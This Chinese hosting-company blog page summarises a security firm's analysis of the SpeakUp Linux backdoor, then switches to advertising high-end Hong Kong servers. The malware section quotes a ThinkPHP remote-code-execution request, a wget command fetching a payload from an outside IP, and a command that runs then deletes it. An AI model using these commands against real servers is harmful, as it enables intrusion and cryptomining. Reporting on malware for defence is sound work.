【小編提示】本文部分內(nèi)容摘自網(wǎng)絡(luò),僅供參考!如需了解服務(wù)器租用\托管相關(guān)問題,請(qǐng)咨詢YINGSOO專業(yè)客服,享受1V1貼心服務(wù)!免費(fèi)熱線400-630-3752

　　【本周熱銷】香港服務(wù)器租用丨美國(guó)服務(wù)器租用

　　【選購(gòu)幫助】如何部署在香港云服務(wù)器網(wǎng)站優(yōu)化，使其訪問速度更快？

　　日前，全球屈指一首的internet安全解決方案供應(yīng)商check point it安全部門研究人員發(fā)現(xiàn)了一個(gè)通過目前Linux服務(wù)器漏洞植入后門木馬的黑客活動(dòng)，此次攻擊的目標(biāo)涵蓋了包括Aws主機(jī)在內(nèi)的世界范圍的全部服務(wù)器。攻擊范圍涵蓋了共6個(gè)不同Linux發(fā)行版和macos系統(tǒng)服務(wù)器中的已知漏洞，目前黑客的主要攻擊目標(biāo)集中在東亞與拉美地區(qū)的Linux服務(wù)器。

　　全球speakUp“受害者”分部

　　這次的惡意攻擊的罪魁禍?zhǔn)妆幻麨閟peakUp，命名方式是以其中一臺(tái)命令與控制（c2）服務(wù)器名稱進(jìn)行命名的。據(jù)悉check point的研究人員發(fā)現(xiàn)speakUp通過Linux服務(wù)器漏洞來植入后門木馬的攻擊方式可以繞過目前所有安全產(chǎn)品，這是由于該惡意軟件中存儲(chǔ)了大量此前出現(xiàn)過的攻擊案例，致使speakUp可以優(yōu)先識(shí)別目前存在的安全漏洞，并成功繞過幾乎所有的殺毒軟件的“雙眼”。speakUp樣本采集在check point的分析報(bào)告中顯示，首次發(fā)現(xiàn)的speakUp樣本是今年1月14日在我國(guó)的服務(wù)器上發(fā)現(xiàn)的，該樣本曾在1月9日被上傳至Virustotal網(wǎng)站（專業(yè)的免費(fèi)可疑文件分析服務(wù)網(wǎng)站）。但經(jīng)過嚴(yán)密的監(jiān)測(cè)后發(fā)現(xiàn)，^{[韓國(guó)高防護(hù)vps]}沒有一家安全產(chǎn)品將speakUp惡意軟件標(biāo)為惡意。

　　這是因?yàn)闉榱颂颖馨踩珯z測(cè)，speakUp的代碼采用了base64加鹽算法加密。不僅如此，c2通信也是采用了相同的方式加密。這也是為什么Virustotal上的殺毒引擎無法將其檢測(cè)為惡意的原因所在。speakUp感染全過程：植入腳本階段根據(jù)check point報(bào)告中披露的數(shù)據(jù)來看，speakUp首先是利用thinkpHp（輕量級(jí)pHp開發(fā)框架）的一個(gè)漏洞為攻擊起點(diǎn)，從中植入一個(gè)pHp shell腳本。使用get請(qǐng)求（如下所示），通過thinkpHp遠(yuǎn)程代碼執(zhí)行漏洞cVe-2018-20062將shell腳本發(fā)送到目標(biāo)服務(wù)器：s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php這個(gè)shell腳本接下來會(huì)通過query中的“module”參數(shù)來執(zhí)行命令。植入后門階段在腳本生效之后，speakUp將進(jìn)行像服務(wù)器植入后門的操作發(fā)送另一個(gè)Http請(qǐng)求（如下所示）到目標(biāo)服務(wù)器：/?module=wget hxxp://67[.]209.177.163/ibus -o /tmp/e3ac24a0bcddfacd010a6c10f4a814bc實(shí)際上，這是一個(gè)注入過程，目的是植入ibus payload并將其存儲(chǔ)到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc啟動(dòng)后門并抹除痕跡階段在植入后門成功后，speakUp將對(duì)服務(wù)器發(fā)送請(qǐng)求，啟動(dòng)后門，在啟動(dòng)后門后speakUp將通過刪除文件來清楚自己的感染痕跡。使用如下Http請(qǐng)求來執(zhí)行后門：/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bcspeakUp感染后果：在Linux服務(wù)器被感染后，speakUp使用post和get請(qǐng)求來與c2通信，c2是被黑的speakupomaha[.]com.。第一個(gè)post請(qǐng)求會(huì)發(fā)送受害者id和其他介紹性的信息，比如安裝的腳本的當(dāng)前版本等。對(duì)應(yīng)的c2響應(yīng)是needrgr，表示受感染的受害者之前未在服務(wù)器上注冊(cè)，需要注冊(cè)。之后，木馬會(huì)通過執(zhí)行以下的Linux命令來post機(jī)器的全部信息：· Uname (-r, -v, -m, -n,-a, -s)· whoami· ifconfig –a· Arp –a· cat /proc/cpuinfo | grep -c “cpu family” 2>&1· who –b

　　一旦受感染服務(wù)器注冊(cè)完成，c2服務(wù)器就會(huì)發(fā)送新的任務(wù)——不同的c2服務(wù)器會(huì)命名受感染服務(wù)器來下載和執(zhí)行不同的文件。有一個(gè)需要注意的點(diǎn)是，speakUp使用了User-Agent用戶代理。具體來說，speakUp定義了三個(gè)用戶代理，而受感染服務(wù)器在與c2服務(wù)器進(jìn)行通信時(shí)必須使用這些代理。其中兩個(gè)代理是macos X User-Agent，第三個(gè)是經(jīng)過哈希處理的字符串：mozilla/5.0 (ipad; U; cpU os 3_2_1 like mac os X; en-us) ApplewebKit/531.21.10 (KHtmL, like gecko) mobile/bAddAdmozilla/5.0 (ipad; U; cpU os 3_2_1 like mac os X; en-^[YINGSOO]us) ApplewebKit/531.21.10 (KHtmL, like gecko) mobile/7b405e9bc3bd76216AFA560bFb5AcAF5731A3

　　目前，speakUp主要服務(wù)于XmRig礦工，為其提供“肉雞（受感染服務(wù)器）”。根據(jù)XmRHunter網(wǎng)站的查詢結(jié)果顯示，攻擊者的錢包目前擁有約107枚門羅幣。speakUp強(qiáng)大的自我傳播能力攻擊者還為speakUp配備了一個(gè)“i”模塊，它實(shí)際上是一個(gè)python腳本，使得speakUp能夠掃描和感染位于受感染服務(wù)器所處內(nèi)網(wǎng)和外網(wǎng)的其他更多的Linux服務(wù)器。其主要功能有：使用預(yù)定義的用戶名和密碼來暴力破解嘗試登陸管理面板；掃描受感染服務(wù)器的網(wǎng)絡(luò)環(huán)境，檢測(cè)共享相同內(nèi)部和外部子網(wǎng)掩碼的服務(wù)器上的特定端口的可用性；嘗試?yán)媚繕?biāo)服務(wù)器上的遠(yuǎn)程代碼執(zhí)行漏洞

　　高端香港服務(wù)器租用選擇

　　對(duì)于需要更高資源的復(fù)雜網(wǎng)站和任務(wù)關(guān)鍵型應(yīng)用程序，高端服務(wù)器可能是最合適的托管解決方案。這些高性能托管解決方案可確保您的網(wǎng)站性能更加流暢，并使您的網(wǎng)站訪問者獲得最佳用戶體驗(yàn)。其中，高端的香港服務(wù)器租用是搭建面向中國(guó)大陸、香港及亞太區(qū)廣泛客戶群的跨境電商網(wǎng)站、國(guó)際電郵、網(wǎng)絡(luò)游戲等業(yè)務(wù)的重要平臺(tái)。擁有數(shù)百萬訪問者的網(wǎng)站根本無法托管在VPS或入門級(jí)獨(dú)立服務(wù)器上。這就是高端服務(wù)器發(fā)揮作用的地方。

　　一、什么是高端香港服務(wù)器

　　我們知道，典型的香港服務(wù)器租用是提供一臺(tái)功能強(qiáng)大的物理服務(wù)器，連接到高速互聯(lián)網(wǎng)連接，并安裝在最先進(jìn)的香港數(shù)據(jù)中心設(shè)施中。

　　高端專用服務(wù)器是一種先進(jìn)的系統(tǒng)，配備強(qiáng)大的CPU，更大的內(nèi)存模塊，RAID磁盤和備份。它具有更強(qiáng)勁的計(jì)算能力，專為實(shí)現(xiàn)最高性能和滿足企業(yè)工作負(fù)載而設(shè)計(jì)。

　　二、高端香港服務(wù)器租用配置

　　高端香港服務(wù)器租用通常用于托管高流量網(wǎng)站，Web應(yīng)用程序以及性能至關(guān)重要的其他托管方案。典型的高端專用服務(wù)器將包括以下內(nèi)容：

　　? 單/雙最新Intel E5 2650以上系列處理器

　　? 64 GB到512 GB RAM。

　　? 帶RAID 10的8至24 TB SATA或高速SSD。

　　? 冗余電源和冷卻裝置。

　　? 每日備份。

　　以上只是一個(gè)示例配置，可根據(jù)獨(dú)特要求進(jìn)行定制/升級(jí)。

　　三、高端香港服務(wù)器租用的用途

　　到目前為止，我們已經(jīng)了解了高端專用^{[網(wǎng)站建設(shè)中域名知多少]}服務(wù)器及其基本配置。現(xiàn)在，我們來看看它們是如何使用的。

　　1、分割和托管虛擬機(jī)

　　設(shè)置HyperVisor服務(wù)器并在其上托管較小的虛擬機(jī)，可能是高端服務(wù)器的最常用用途。通常，服務(wù)商使用這些高端服務(wù)器來托管多個(gè)虛擬機(jī)并向其客戶銷售，也就是我們以前常接觸的VPS。在某些情況下，企業(yè)還租用一臺(tái)大型服務(wù)器來創(chuàng)建一個(gè)小型虛擬機(jī)，以便在內(nèi)部使用它們。

　　2、托管高流量網(wǎng)站

　　托管一個(gè)吸引成千上萬個(gè)并發(fā)請(qǐng)求的網(wǎng)站(如電商網(wǎng)站)是資源密集型的，許多網(wǎng)站管理員選擇“擴(kuò)展”到更強(qiáng)大的服務(wù)器，而不是“擴(kuò)展”到許多功能較弱的服務(wù)器。選擇單個(gè)高端專用服務(wù)器的管理要比構(gòu)建小型服務(wù)器集群要簡(jiǎn)單得多。

　　3、構(gòu)建Web服務(wù)器以托管多個(gè)網(wǎng)站

　　大多數(shù)網(wǎng)絡(luò)托管公司和網(wǎng)絡(luò)服務(wù)提供商在高端服務(wù)器上構(gòu)建他們的產(chǎn)品。中等配置的高端服務(wù)器能夠托管數(shù)百甚至數(shù)千個(gè)較小的站點(diǎn)。

　　4、搭建私有云

　　私有云和公共云平臺(tái)都是基于高端專用服務(wù)器構(gòu)建的，但許多企^{[云服務(wù)器價(jià)格對(duì)比]}業(yè)更喜歡自己的云來托管其專有應(yīng)用程序。在這種情況下，許多企業(yè)選擇租用高端香港服務(wù)器，來運(yùn)行他們自己的私有云，虛擬機(jī)和其他托管服務(wù)。

　　YINGSOO電話：4006-303-752

　　熱門文章：【服務(wù)器速度】【美國(guó)安全服務(wù)器怎么保證安全】【如何選擇合適的服務(wù)器】【獨(dú)立ip服務(wù)器有哪些優(yōu)勢(shì)】【服務(wù)器宕機(jī)原因】【香港沙田服務(wù)器速度怎么樣】【裸金屬服務(wù)器】【香港虛擬主機(jī)排行】【怎么用流量攻擊服務(wù)器】【免費(fèi)服務(wù)器】【為什么要推薦香港vps】【香港cn2主機(jī)排行】【高防服務(wù)器的種類有哪些】【香港云主機(jī)排名】【如何保障香港獨(dú)立服務(wù)器的安全】【如何選擇上等的美國(guó)服務(wù)器】【高性價(jià)比日本高防服務(wù)器租用】【高速集群服務(wù)器是什么】【魔獸懷舊服最有牌面的服務(wù)器】【ddos攻防不斷】

　　YINGSOO韓國(guó)主機(jī)代理3天免費(fèi)試用,注冊(cè)享特惠!

　　韓國(guó)主機(jī)代理控制面板自主管理,5分鐘交付,KT高品質(zhì)機(jī)房,平均延遲低至80ms,2019年韓國(guó)主機(jī)代理銷量再度破表,1200家企業(yè)共同選擇,高達(dá)95%的續(xù)約率印證YINGSOO品質(zhì)

　　http://maisonbaluchon.cn/products/cloud-kr.html

　　香港主機(jī) 按月買,就選YINGSOO,用了都說好

　　9年香港主機(jī) 按月買業(yè)務(wù)運(yùn)營(yíng)經(jīng)驗(yàn),連續(xù)3年香港主機(jī) 按月買業(yè)務(wù)名列前茅.香港寬頻,HKT機(jī)房核心合作伙伴,1200家企業(yè)客戶共同選擇,24小時(shí)在線服務(wù)

　　http://maisonbaluchon.cn/products/cloud-hk.html

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。